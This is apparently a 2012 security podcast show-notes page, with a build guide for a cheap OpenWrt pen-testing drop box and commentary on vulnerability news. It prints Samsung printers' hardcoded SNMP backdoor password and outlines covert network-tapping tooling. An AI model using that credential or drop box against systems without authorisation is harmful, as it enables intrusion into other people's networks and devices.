Episode310

From Paul's Security Weekly
Jump to: navigation, search
Palo Alto Networks
Tenable Network Security
The SANS Institute
Pwnie Express
Black Hills Information Security

Episode Media

MP3

Announcements & Shameless Plugs

PaulDotCom Security Weekly - Episode 309 for Tuesday November 20th, 2012

  • Bsides everywhere baby! Likely there is one near you, so check the web site www.securitybsides.com. Next local BSides is in Boston on February 23d.
  • Please fill out Intern Mike's survey for which locations and what SANS Mentor-led courses you'd like to see in the Boston-area.

Tech Segment: MiniPwner (TP-Link TL-WR703n Pen Testing Drop Box)

Background

The MiniPwner is a pen-testing drop box. Prior to the MiniPwner we were using a Pwnie Express or an Apple travel router as drop boxes during physical penetration tests. But these solutions depended on a known IP addressing scheme or DHCP, a power outlet near an open network port, and unfiltered Internet access. My wish list for a home-built drop box was a router that was small, inexpensive, OpenWRT supported, had wired and wireless interfaces, had space for a USB drive, and could be battery powered, all without soldering or custom firmware. The WR703N router had recently become available and OpenWRT supported and seemed to be a perfect fit.

Incarryingcase1.png

What Makes it Cool

  • TL-WR703N is cheap (under $25)
  • Small but powerful - Wired, Wireless, USB, battery power
  • No need to compile firmware or do any soldering to build a MiniPwner
  • Flexibility - add whatever packages you desire

MiniPwner Build Overview

What you'll need:

  • TPLink TL-WR703N (or the slightly larger TL-MR3020)
  • USB flash drive (I like the low profile Cruzer Fit drives)
  • Battery Pack (I get the Sharper Image charger kit)
  • Ethernet cable, velcro

High Level Build Steps 1) Download the current OpenWrt firmware from downloads.openwrt.org or the 5/14/2012 "Derbycon" build off minipwner.com. 2) Use the web interface of the factory firmware to flash the router 3) Configure the Network 4) Mount the USB Drive 5) Download and install security packages

Some of the packages in the build script include: Nmap, Tcpdump, Aircrack-ng, Kismet, Openvpn, Airpwn, Dsniff, SSLsniff, Parasite, Reaver, Nbtscan, Snort

The "DerbyCon" build uses the nightly snapshot from 5/14/2012 with a couple mods. A custom build script can be found in /user/share after the firmware is applied, and Reaver has been added to the packages repository. It is the only build I know of with Dsniff, Kismet and Reaver all working.

Some of Kevin's favorite TL-WR703N Mods and Projects

Add a serial cable so you can re-flash a bricked router

Internal USB Hub Expansion

Hubmod.png

"Karma (Jasager/Wifi Pineapple capabilities)"

Meld the battery to the router

Pirate Box

Piratebox.png

Home Automation

Robot Control

Robot310.png


MintyPwner MiniPwner guts shoved into an Altoids tin

Mintyopenzoom.JPG

Lots of other projects in the WR-703N OpenWRT Forum

Stories

Paul's Stories

  1. US-CERT: Samsung Printer Firmware Contains Backdoor - Oh, and here is the MIB This is one giagantic flaming pile of crap. The entire thing, from firmware to vulnerability disclosure, it all sucks. So, once upon a time a developer decided it would be a good idea (likely sometime in 2004), to add in an SNMP backdoor. This means the device will listen on UDP port 1118 for SNMP traps. The same password of "s!a@m#n$p%c" will get you in and allow you to read (and write?) via SNMP. Samsung came out and said there was a vulnerability, and it affected Dell printers too. Samsung said they would produce a fix before the end of the year. They did not release the models that are vulnerable. Then they said they would have a fix for us tomorrow. In the mean time, they've pulled all the firmware downloads from their site. What are you hiding Samsung? What, you don't want us to know just how deep and wide your problems with firmware go? Now you've caught my attention, and the attention of lots of other firmware reverse engineering curious type people. I'm still on a mission to improve the security of embedded systems, and this is one reason why. I agree with some of thecomments on Twitter, we are all to blame. Developers are to blame, users, and security folks for not working together and fixing the problem.
  2. NEOHAPSIS - Security Advisory - TP-LINK TL-WR841N LFI - Just an FYI, this does not require a password to execute, its sorta like an LFI with a splash of authentication bypass. Not only that, but the web user can read the freaking /etc/shadow file according to the advisory. Holy face palm batman!
  3. Belkin wireless routers weak key - Who thinks its a good idea to base the default key on the MAC address? Really? Just stop, don't put a default WPA/WPA2 key on the device. Let the user enter it, make a wizard or something. If the user can't figure out how to enter a password, they shouldn't use wirless. If they really want to use wireless, they should call the geek squad or something.
  4. The Hackback Debate | Steptoe Cyberblog - This was way too long to read, but I will read it at some point. There are a few articles a month on hacking back. There needs to be more.
  5. Prince William photos accidentally reveal RAF password | Naked Security - So, you work for the military. Doesn't even matter which military, and somehow you thinks its a good idea to print out the username and password for a system, stick it on the wall, then let press take pictures? Super Fail, super fail, you're a super fail super fail!!!
  6. Backdoor found in Piwik analytics software - Update - The H Security: News and Features - Guess how the backdoor got there? If you guessed a vulnerable Wordpress plugin you won the lottery! (Not really, someone from the midwest and Arizona won, congrats to you, lets see how long before you go broke, crazy, or dead, and not in that order). I wonder if it was the Wordfence plugin, thats a security plugin that contains an XSS vulnerability. Think they could be more like Yahoo! and not have stupid XSS vulnerabilities, oh wait, nevermind.
  7. Yahoo XSS exploits going for $700 - Yep, Yahoo! has XSS, could be fun to exploit this one, steal cookies, etc... Turns out is so much fun that people are selling them for $700, which I think is low...
  8. ENISA promotes digital hacker traps - honeypots are powerful tools that CERTs (Computer Emergency Response Teams) can use to have "threat intelligence collected without any impact on production infrastructure". Amen to that, if you have your ducks in a row, deploy a honeypot today!
  9. Mobile browser vulnerability lets hackers steal cloud computing time - I think its interesting that people used to steal computer time when the first computers were invented, now we've gone back to that.
  10. Top 5 Security Predictions for 2013 from ISF - This is the best advice ever: Organizations must prepare for the unpredictable so they have the resilience to withstand unforeseen, high impact events. Gee, thanks for that.
  11. Geek Researcher Spends Three Years Living With Hackers - Funny, after staring atpeople sitting in front of a computer who don't shower, she came to the conclusion that hackers are actually pretty boring and smelly people!
  12. US software firm hacked for years after suing China - The Empire Strikes Back should have been the title of this article...

Larry's stories

  1. Track students with RFID? Anonymous no likey - [Larry] - From the internet vigilantes division, A school in texas decides to track student movement (that sucks, BTW, and so much fun). A student refused to be tracked, and Anonymous took issue with the school. Tango Down…
  2. YAY OSINT! - [Larry] - A neat new tool coming out of Kiwicon that utilizes keywords for monitoring various social media via API. Neat stuff!
  3. Hotel lock fail in the wild - [Larry] - Remember that hotel lock break in method we've mentioned more than once in the past? Yeah, well, turns out a hotel in Houston suffered a number of breakins as a result of the vulnerability.

Allison's stuff

  1. China hackers drive US software maker to the brink This is a fascinating article and an excellent read. Even though the article didn't provide many technical details it looked to me like the software company handled the attacks in the worst way possible. Why didn't they bring in outside help for the unexplained downtimes, or why didn't they investigate why revenues dropped with no explanation? Competent IT is hard to come by and I think that's what really burned this small business in the end.
  2. W32/Autorun.worm.aaeb is another autorun worm blowing up networks I've been seeing this blow up in the past few days. If you see your network shares filling up with files like porn.exe, sexy.exe, passwords.exe, you're infected!
  3. "Leaping Brain"'s DRM feature claims to provide "Fort Knox-Level Security" from their site: "Video content is protected with our BrainTrust™ DRM, and is unplayable except by a legitimate owner. All aspects of the platform feature a near-ridiculous level of security." The encryption method: First 15kB is xor'ed with "RANDOM_STRING". That's the actual string value.
  4. TheGrugq presents OPSEC for hackers This is a fascinating lecture as it presents various ways people have gotten busted.
  5. Swedish exchange is paralyzed by buy order for "-6 stocks" While not strictly security related, I find this amusing. Any sufficiently horrible software can be pushed over no matter what you do...